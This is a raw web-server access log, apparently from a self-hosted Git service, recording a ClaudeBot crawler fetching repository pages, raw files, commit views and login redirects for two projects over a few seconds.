"/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-4_access.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-3_access.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 216.73.216.188] [Length 10839] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11789] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16512] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16501] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2Fdata%2Flogs" [Client 216.73.216.188] [Length 57587] [Gzip 10.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11796] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14240] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 453308] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13967] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-2_access.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11898] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13957] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom5.png" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fmain..ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11976] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11366] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/vite.config.ts?display=source" [Client 216.73.216.188] [Length 11985] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10199] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" [Client 216.73.216.188] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 216.73.216.188] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" [Client 216.73.216.188] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore?display=source" [Client 216.73.216.188] [Length 10984] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10903] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr 